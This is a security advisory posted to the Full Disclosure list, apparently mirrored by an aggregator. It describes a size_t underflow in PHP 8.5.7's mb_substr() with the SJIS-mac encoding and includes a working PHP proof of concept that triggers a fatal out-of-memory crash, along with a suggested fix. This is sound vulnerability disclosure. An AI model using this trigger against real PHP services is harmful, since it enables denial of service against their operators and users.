PHP 8.5.7 `mb_substr()` 'SJIS-mac' size_t underflow
Full Disclosuremailing list archivesFrom: Khashayar Fereidani <info () fereidani 2026-6-21 03:50:57 Author: seclists.org(查看原文) 阅读量:3 收藏

fulldisclosure logo

Full Disclosure mailing list archives


From: Khashayar Fereidani <info () fereidani com>
Date: Fri, 19 Jun 2026 09:53:43 +0330

# PHP 8.5.7 `mb_substr()` 'SJIS-mac' size_t underflow

**Author:** Khashayar Fereidani
**Disclosure Date:** 2026-06-18
**Advisory:** https://fereidani.com/php-857-mbsubstr-sjis-mac-sizet-underflow
**Contact:** https://fereidani.com/contact

## Description

The `mb_get_substr()` function in `ext/mbstring/mbstring.c`
deliberately skips an early empty return guard for the `SJIS-mac`
encoding when `from >= in_len`. As a result, it falls through to
`mb_get_substr_slow()`, executing `mb_convert_buf_init(&buf, MIN(len,
in_len - from), ...);`. When `from > in_len`, the parameter `in_len -
from` underflows the `size_t` representation, resulting in a vastly
large allocation size (near ~2^64 bytes). This leads to an immediate
Out-Of-Memory (OOM) fatal error. Furthermore, if
`_ZSTR_STRUCT_SIZE(initsize)` wraps past `SIZE_MAX`, it could
potentially allocate a tiny buffer while the structural limit retains
the pseudo-wild value, resulting in a heap buffer overflow when
subsequent codepoints are decoded and written.

## Proof of concept

```php
<?php
/*
 * PoC: mb_substr() 'SJIS-mac' size_t underflow
 * File:  ext/mbstring/mbstring.c  mb_get_substr() (~L2129) +
mb_get_substr_slow() (~L2102) *
 * mb_get_substr() deliberately skips the early "return empty" guard
for SJIS-mac:
 *
 *     if (len == 0 || (from >= in_len && enc != &mbfl_encoding_sjis_mac)) {
 *         return zend_empty_string;     // <-- sjis_mac bypasses this
when from >= in_len
 *     }
 *
 * ... then falls through (sjis_mac is multibyte, not SBCS/WCS2/WCS4) to
 * mb_get_substr_slow(), whose first line is:
 *
 *     mb_convert_buf_init(&buf, MIN(len, in_len - from), ...);
 *
 * With `from > in_len` (bytes), `in_len - from` UNDERFLOWS size_t to ~2^64.
 * mb_convert_buf_init does emalloc(_ZSTR_STRUCT_SIZE(initsize)).
 *
 * Two outcomes, both wrong (correct result is the empty string):
 *  (A) `from` huge -> initsize ~2^64 -> fatal "Allowed memory size exhausted
 *      (tried to allocate 18446744073708551644 bytes)". CONFIRMED below.
 *  (B) `from` only slightly > in_len -> initsize sits just under 2^64 and
 *      _ZSTR_STRUCT_SIZE(initsize) WRAPS past SIZE_MAX to a tiny allocation,
 *      while buf->limit = out + initsize stays wild -> a subsequent write of
 *      decoded codepoints is a HEAP OVERFLOW. (Harder to trigger reliably:
 *      needs a SJIS-mac input decoding to more codepoints than bytes, i.e.
 *      from < codepoint_count while from > byte_count. Worth upstream review.)
 */
echo "PHP ", PHP_VERSION, "  sjis_mac available: ",
     (in_array("SJIS-mac", mb_list_encodings()) ? "yes" : "no"), "\n\n";

/* control: a normal encoding with from > strlen returns "" cleanly */
echo "UTF-8, from=10 > strlen('abc'): -> "; var_dump(@mb_substr("abc",
10, null, "UTF-8"));

/* The bug: SJIS-mac, from >> strlen, length omitted -> underflow -> OOM fatal.
 * The "tried to allocate 18...644 bytes" is literally (size_t)(3 - 1000000). */
echo "SJIS-mac, from=1000000 > strlen('abc'):\n";
@mb_substr("abc", 1000000, null, "SJIS-mac");
echo "(if you see this line, the fatal error above was caught/suppressed)\n";
```

## Impact

An attacker could intentionally furnish conditions where `from >
in_len` alongside the 'SJIS-mac' encoding, triggering a `size_t`
underflow. This predictably causes a severe Out-Of-Memory (OOM) fatal
error, culminating in a Denial of Service. Depending on environmental
details, it might hypothetically cause a heap buffer overflow.

## Solution

Adjust the constraints inside `mb_get_substr()` and
`mb_get_substr_slow()` in `ext/mbstring/mbstring.c`. The calculation
`in_len - from` should be adequately bounds-checked to halt
computation or safely cap at zero when `from > in_len`, sidestepping
the underflow when initializing string buffers.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


Current thread:

  • PHP 8.5.7 `mb_substr()` 'SJIS-mac' size_t underflow Khashayar Fereidani (Jun 20)

文章来源: https://seclists.org/fulldisclosure/2026/Jun/12
如有侵权请联系:admin#unsafe.sh